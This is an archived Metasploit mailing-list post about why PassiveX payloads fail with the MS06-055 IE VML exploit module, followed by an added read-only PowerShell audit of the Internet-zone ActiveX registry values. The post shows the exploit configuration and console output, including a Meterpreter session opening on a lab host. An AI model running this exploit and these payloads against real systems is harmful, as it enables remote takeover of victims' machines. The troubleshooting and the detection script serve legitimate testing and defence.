Metasploit mailing list archives
PassiveX-based payloads and MS06-055
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Tue, 13 Mar 2007 12:35:27 +0100
While doing a few tests I noticed a strange behavior while trying to exploit the VML processing vulnerability in IE referenced by the Microsoft Bulletin MS06-055 on Windows XP SP1. The first thing I tried is using Meterpreter as shown below.

msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.33.130   yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH  pentest          no        The URI to use for this exploit (default is random)

Payload options:

   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DLL       /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC  seh                                            yes       Exit technique: seh, thread, process
   LPORT     4444                                           yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows NT 4.0 -> Windows 2003 SP1

msf exploit(ms06_055_vml_method) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.33.130:8080/pentest
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.33.130:39557 -> 192.168.33.199:4444)

... and everything works fine. When I try using PassiveX Meterpreter instead...

msf exploit(ms06_055_vml_method) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.33.130   yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH  pentest3         no        The URI to use for this exploit (default is random)

Payload options:

   Name       Current Setting                                Required  Description
   ----       ---------------                                --------  -----------
   DLL        /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC   seh                                            yes       Exit technique: seh, thread, process
   PXAXCLSID  B3AC7307-FEAE-4e43-B2D6-161E68ABA838           yes       ActiveX CLSID
   PXAXDLL    /home/buffer/msf3/data/passivex/passivex.dll   yes       ActiveX DLL to inject
   PXAXVER    -1,-1,-1,-1                                    yes       ActiveX DLL Version
   PXHOST     192.168.33.130                                 yes       The local HTTP listener hostname
   PXPORT     10000                                          yes       The local HTTP listener port
   PXURI      /OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s              no        The URI root for requests

I see this behavior...

msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/pentest3
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
[*] Sending PassiveX main page to client

and it stops here. I tried using other PassiveX-based payloads with the same exploit but no luck... always the same result. Other non-PassiveX-based payloads work instead.

I took a look at the registry and everything seems to work fine since

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Values: 1004, 1200, 1201, 1001

are changed to the value 0 as expected.

Regards,

--
Angelo Dell'Aera 'buffer'
Antifork Research, Inc.   http://buffer.antifork.org
Metro Olografix
PGP information in e-mail header
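The registry key and the four values the post names are the Internet Explorer "Internet zone" (zone 3) ActiveX policies; a value of 0 means Enable, 1 means Prompt and 3 means Disable, and 1004 (download unsigned ActiveX) and 1201 (initialize and script controls not marked safe) ship as Disable in that zone. The following audit script is an added example, not part of the original post or of Metasploit: it reads those values from the current user's hive and flags any that a PassiveX-style tampering would leave at 0. The key path, the action IDs and their descriptions are the documented IE zone settings; the function name and the "suspicious" heuristic are the example's own choices.

```powershell
# Added defender-side example (not from the original post or from Metasploit).
# Reads the Internet zone (zone 3) ActiveX URL-action values the post mentions
# and reports any that are set to 0 (Enable). It only reads; nothing is changed.

# Zone 3 = Internet zone. If the "Security_HKLM_only" policy is in force the
# HKLM copy of this key wins; pass that path via -Path to audit it instead.
$ZonePath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'

# URL action IDs named in the post and what each one controls.
$Actions = @{
    '1001' = 'Download signed ActiveX controls'
    '1004' = 'Download unsigned ActiveX controls'
    '1200' = 'Run ActiveX controls and plug-ins'
    '1201' = 'Initialize and script ActiveX controls not marked as safe for scripting'
}

# Value meanings for these actions: 0 = Enable, 1 = Prompt, 3 = Disable.
$Meaning = @{ 0 = 'Enable'; 1 = 'Prompt'; 3 = 'Disable' }

# Actions that IE disables by default in the Internet zone; 0 here is a red flag.
$DisabledByDefault = @('1004', '1201')

function Get-InternetZoneActiveXPolicy {
    param([string]$Path = $ZonePath)

    if (-not (Test-Path -Path $Path)) {
        Write-Warning "Zone key not found: $Path"
        return
    }
    $props = Get-ItemProperty -Path $Path

    foreach ($id in ($Actions.Keys | Sort-Object)) {
        $value = $props.$id          # $null when the value is absent
        $label = if ($null -eq $value) {
            'not set'
        } elseif ($Meaning.ContainsKey([int]$value)) {
            $Meaning[[int]$value]
        } else {
            "unknown ($value)"
        }

        [pscustomobject]@{
            ActionId   = $id
            Action     = $Actions[$id]
            Value      = $value
            Setting    = $label
            Suspicious = (($value -eq 0) -and ($id -in $DisabledByDefault))
        }
    }
}

$report = Get-InternetZoneActiveXPolicy
$report | Format-Table -AutoSize

if ($report | Where-Object { $_.Suspicious }) {
    Write-Host 'Internet zone allows unsigned or unsafe ActiveX (value 0). Restore 3 (Disable) via Internet Options > Security or Group Policy, and check what changed the values.'
}
```

A value of 0 on 1004 or 1201 after a browser compromise is exactly the footprint the post describes, so the same check is worth folding into host baselining or an incident triage script; a value of 0 on 1200 is the Internet zone default and is not by itself evidence of tampering.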
Current thread:
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 14)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 14)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 16)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)